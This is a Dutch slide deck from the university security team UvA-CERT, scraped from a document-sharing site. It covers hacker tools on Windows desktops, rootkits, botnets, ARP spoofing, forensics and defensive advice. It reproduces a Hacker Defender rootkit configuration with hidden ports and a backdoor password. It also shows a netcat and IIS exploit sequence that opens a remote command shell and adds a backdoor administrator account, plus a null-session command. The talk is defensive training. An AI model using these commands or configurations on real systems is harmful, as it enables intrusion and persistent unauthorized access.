Docstoc

Architectuur van de Infrastructu

Document Sample
Architectuur van de Infrastructu Powered By Docstoc
					Levensloop van een Windows
         Desktop




           UvA-CERT
           maandag 5 april 2004
       Jim Mintha & Jaap van Ginkel
Huishoudelijk

       Telefoon op stil of tril
       Vragen tussendoor
       Hoog tempo (jullie zijn slim)
       Veel demo’s dus soms even geduld
Programma


  13:30 - ontvangst met koffie en thee
  14:00 - start van het programma
            - welkom door voorzitter SURFnet-CERT
            - start presentatie door UvA-CERT
  15:00 - pauze met koffie en thee
  15:30 - vervolg presentatie door UvA-CERT
            - ruimte voor vragen en discussie
  16:30 – borrel
  17:30 - einde
Agenda

   – Wie is UvA-CERT
   – Bedreigingen Windows Desktops
     • Hackertools en spoofing
     • Rootkits Hackerdefender
     • Botnets passwordgrabbing
   – Forensics
     • Theorie
     • Tools Helix/Encase
   – Cleanup
Wie is UvA-CERT
Disclaimer


    Blackhat - Whitehat
    Misbruik je kennis niet
    Tools niet binnen SURFnet
      – downloaden
      – Testen
    Tools zijn soms gevaarlijk !
Werkwijze

   Hoe werken hackers
     –   Waarom doen ze het
     –   Hoe komen ze binnen
     –   Welk gereedschap gebruiken ze
     –   Demo inbraak (NC/Hackerdefender/Cain)
Hoe werken Hackers


    Motivatie
     – DDOS attacks
     – FTP/FXP/ Warez servers
     – IRC Wars
     – SPAM
    Type inbreker
     – Hackers, Crackers, Script Kiddies
     – Spammer, Afpersers, Terroristen ?
Of anders:


    High level
      – Zeldzaam
      – Moeillijk te vinden
    Medium level
      – Frequent
      – Script kiddies zijn niet altijd dom
    Wormen
      – Geautomatiseerde hacks met callback home
Hoe pakt een hacker het aan

     Scan het net op kwetsbare systemen
     Vind een gat (pentest)
     Voer cmdshell uit
     Controleer diskspace/bandbreedte/cpuspeed
     Installeer backdoor
     Maak administrator account
     Maak tweede (derde) achterdeur
     Verberg sporen (rootkit/logging)
     Gebruik verworven rechten/subnet voor volgende
      hackpoging
Wachtwoorden


   Als je PC gekraakt is hebben ze je
    wachtwoord
   Local admin passwords
   SAM wordt opgehaald
   Vaker veranderen
Hackerdefender ini file
   [H<<<idden T>>a/>">>ble] r|c<md\.ex<e:: nnt* vchost* logiscan* miitwain* fjscan* ncdtree*
        ioftp.exe iobanana.exe ioa.exe ati2ev* mpx.exe Lib16* commondlg* eof.dll thumb.dll
        ioservic* mpx.cfg “
   [:\:R:o:o\:t: :P:r>:o:c<:e:s:s:u<:s:>"] r|c<md\.ex<e:: vchost* nnt* ioftp.exe iobanana.exe ioa.exe /
   [/H/idd\en Ser:vi"ces] ms-up* r_serv* ati2ev* tcpnet* iosrv* msrpcss* socks
   [Hi:dden R/">>egKeys] ati2evxx LE":GACY_ATI2EVXX TCPNetBDrv
        LE":GACY_TCPNETBDRV \"[Hid:den\> :RegValues]""" :
   [St/\artup\ Run/] ":
   [\Fr<ee>> S:"<pa>ce]
   C:10000000000
   D:10000000000
   E:10000000000
   F:10000000000
   G:10000000000
   "[>H<i>d"d:en<>\ P/:or:t<s"]\:
   TCP:101,3333,6667,123,10001,444,10101,39486,57164,57165,55555,43958,55556 UDP:10001
   [Set/tin/:\gs] /
   P:assw\ord=bienf4t57336667
   Ba:ckd:"oor"Shell=nntß$.exe
   Fil:eMappin\gN/ame=Graphics
   Serv:iceName=ati2evxx >
   Se|rvi:ceDisp<://la"yName=Graphics System Drivers
   Ser>vic:eD||escr<ip:t"ion=3D acceleration
   Dri<ve\rN:ame=TCPNetBDrv D:riv>erFileNam/e=nntpdrv.sys
Welke tools gebruiken hackers


    Selectie:
    Alleen werkelijk gebruikte tools binnen
     UvA
    Windows tools
    Networking tools
Null Sessions Scanners


    Net use \\icarus\IPC$ /user:””           ””
      Toegang tot vitale systeeminformatie
      Gebruikt door veel scantools
      Moeillijk te beveiligen
      Disable in de registry
      Filteren op poort 135, 139 en 445
SQLscan


     In diverse varianten beschikbaar
     Inventariseert MS-SQL server
     Zoekt ongepatchte servers
     Controleert SA wachtwoord
     Brute force attacks
Bots


      Remote control via IRC of P2P
      Vaak grote netwerken
      Steeds meer functionaliteit
      Ddos
      SPAM
      Harvesting
      Aangestuurd door C&C host
Botfamilies


    Agobot/Phatbot/Forbot/XtremBot

    SDBot/RBot/UrBot/UrXBot/...

    mIRC-based Bots - GT-Bots
Radmin


   Remote control applicatie (Grafisch)
   Legale applicatie
   Vaak geinstalleerd onder andere naam
   Gebruik liever Windows Terminal service in
    remote management mode
   http://www.radmin.com/download/default.html
Dameware


   Remote control applicatie (Grafisch)
   Legale applicatie
   Ouder dan 4.0 == exploits
   Vaak geinstalleerd onder andere naam
   Gebruik liever Windows Terminal
    service in remote management mode
   http://www.dameware.com
WinVNC/RealVNC


   Remote control applicatie (Grafisch)
   Legale applicatie
   University of cambridge ontwerp
   Multiplatform
   Vaak geinstalleerd onder andere naam
   Gebruik liever Windows Terminal service in
    remote management mode
   http://www.realvnc.com
SERV-U FTP server


      Compacte flexibele FTP server (IOFTPD)
      Legale software
      Vaak hernoemd
      Ondersteund plugins
       –   Dynamische DNS
       –   Sitestats
       –   Uploadcredits
       –   Intersite traffic
    HomeDir=c:\winnt\system32\spool\drivers\w32x86\_
     \com4\aux\lpt2\lpt1\files\files\files\files
Fport


    Scant lokale open poorten
    Met het proces wat erbij hoort
    Legale applicatie
        – www.foundstone.com/resources/freetools.htm

    Kan worden hernoemd
    Ook nuttig voor beheerder
Fakegina


      Vervanging voor Windows login
      Illegale software
      Logt wachtwoorden naar bestand
      Volledig transparant
      Kan worden hernoemd (ook de passlist)
      Soms gecomprimeerd
Verbaasd….
Waar zit ie naar te kijken
Hacker defender


      Rootkit
      Illegale software
      Backdoor
      Verbergt sporen van hacker
       –   Bestanden
       –   Processen
       –   Registry entries
       –   Poorten
      API hooking
      Port multiplexing
      Open source sinds 1.00 (1 jan 2004) !
      Legacy rootkit !
Cain Abel


      Password recovery tool 
      ARP poisoning
      MITM (Man in the Middle attack)
      Sniffer
      Cracker
      En veel meer
Antivirus ontwijking


      Executable packing (upx pepack)
      Executable morphing (morphine)
      Rootkits
      Renamen te scannen extensies
      Beschadigen/ stoppen scanner
       – AV killer
    Steeds nieuwe versies/private versies $$
    Gebruik van legale componenten
Sniffing op een Hub



     Sniffer                         Source   Destination




                      CISCOSYSTEMS




                                      Hub
Host to Host ARP



     Client (C)          Server (S)                Hostile




              Real ARP Reply      Spoofed ARP ReplyC

                                      Spoofed ARP ReplyS
        Broadcast ARP Request
Host to Router Exploit



     Client (C)      Gateway Router (R)                   Hostile

                         CISCO SYSTEMS




              Real ARP Reply             Spoofed ARP ReplyC


                                            Spoofed ARP ReplyR
        Broadcast ARP Request
Relay Configuration

                           Attacker
                  0:c:3b:1a:7c:ef- 10.1.1.10




              Alice                             Bob
     0:c:3b:1c:2f:1b- 10.1.1.2        0:c:3b:9:4d:8- 10.1.1.7

     0:c:3b:1a:7c:ef- 10.1.1.7        0:c:3b:1a:7c:ef- 10.1.1.2
Relay Configuration (cont.)

        Sniffer                      Source   Destination




                      CISCOSYSTEMS




                                     Switch
FUD


   Dit waren alleen de tools gevonden op
    UvA systemen
   Andere threats:
      – Backoriffice (nog steeds)
      – Assasin
      – Armaggedon
      – Optix pro/lite
Netcat

    Open een listening port op lokale machine
         – nc –l –p portnumber
    Draai IIS5Exploit.exe
         – IIS5exploit target_ip host_ip nc_port_number
    Wacht op een Command shell
         – Microsoft Windows 2000[Version 5.00.2195] (C) Copyright
           1985-1999 Microsoft Corp.
         – C:\WINNT\SYSTEM32>
    Voeg een gebruiker to
         – net user hacker rabbit99 /add
    Maak de gebruiker administrator
         – net localgroup administrators hacker /add
Wie is er aan het inbreken ?
Hoe houden we ze tegen
Ken je services

    Ken je poortnummers en processen
    Bekende set basiservices
      – 22 ssh 25 smtp 110 pop 139 enz
    Specifieke dingen
      – 8000 9200 enz
    Mapping processen port numbers
      – Tcpview / Fport
Preventie

    Detectie
         • Virusscan/IDS/ netflow/ analyse logging / afwijkende
           patronen
    Preventie
         • Patchen/Opschonen systemen/ preventieve scans
    Tijdig patchen
         • Windows update SMS MOM SUS
         • SUS WUS
    Virusscanner
    Firewall/port filtering
Aanbevelingen voor beheerders

    Regelmatig en consequent patchen !!!!
    Goede wachtwoorden kiezen en regelmatig
     wijzigen
    Null shares beveiligen
    NT 4 uitfaseren maar nu wel patchen !
    IPv6
    Devices zoals Printservers laatste firmware
     op netwerkkaarten
    Minimale set services
    Schoon accounts op lokaal en in domein
Aanbevelingen voor eindgebruikers


  1. Kies een degelijk wachtwoord en
     verander het
  2. Patch het OS en de applicaties
     waarmee je werkt
  3. Draai een up to date virusscanner
  4. Beheer alleen vanaf vertrouwde
     machines
Leuke tools voor anti-hackers


    Windows OS en resourcekit !
      – Nbtstat ipconfig netstat safe boot enz
    Sysinternals.com en Winternals.com
      – TCPview regmon filemon autoruns enz…
      – Password changer
      – ERD commander ! $$$
    Foundstone.com
      – Fport forensics toolkit (free)
    NTsecurity.nu
Doel


      Basisvaardigheden forensics
      Leren van ervaringen
      Bewijsmateriaal verzamelen
      Voorbereid zijn op calamiteiten
Aanpak CERT-UvA


   Brede kennis van First response
    technieken (Helix)
   Centrale forensics kennis CERT-UvA
    (Encase)
   Snel naar justitie (KLPD HTCC)
Helix 1.6 Versie 12 maart 2005
Dus niet
Maar
Forensics


      Zorgvuldig werken
      In volgorde van vergankelijkheid
      Origineel beschermen
      Documenteren
      Snel overdragen
Juridische aspecten


      Privacywetgeving
      Documenteren
      Opsporingsbevoegdheid
      Wettelijk bewijs
      Aansprakelijkheid
Vergankelijkheid


      Inhoud geheugen (RAM)
      Process info
      Netwerkconnecties
      swap/paging space
      MAC Times
      Disk image voor shutdown
      Disk image off-line
Disk Imaging


      Live versus off-line
      Physical versus logical disk
      Read write protection
      Uitwisselbaar formaat
      MD5 Checksums
Waar verstopt


      Legale bestanden en directories
      Rootkits
      Alternate datastreams
      Recycler/systeem directories
      Reserved filenames
      In memory
      Tripping technieken
Waar sporen


      Internet history/cache
      Office document versies/wijzigingen
      Thumbnails van graphics
      Slecht geformateerde media
      Slack space
      Trash/deleted/
Kat en muis spel


    Rootkitrevealer vs Hacker defender
Vragen ?
Contactinfo

   Cert-UvA
     – cert@uva.nl
   SURFnet-CERT
     – cert@surfnet.nl
   Jim Mintha
     – J.T.Mintha@uva.nl
     – 020-5254919
   Jaap van Ginkel
     – J.A.vanGinkel@uva.nl
     – 020-5253705
     Hackers en hun Tools
                              of
welke Trojaanse paarden reizen ongemerkt mee op uw achterbank




           Informatiseringscentrum UvA
                     donderdag 15 april 2010
Hackers exposed


      Scambray
      Mclure
      Kurtz
      Ook in NL versie
      Linux/Web/Java
Social Engineering


      Mitnick
      Ex-Hacker
      Vermakelijk
      Leerzaam
Knoppix-STD 0.1

     – Versie 26 januari 2004
UvA-CERT Computer Forensics

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:4
posted:4/15/2010
language:Dutch
pages:62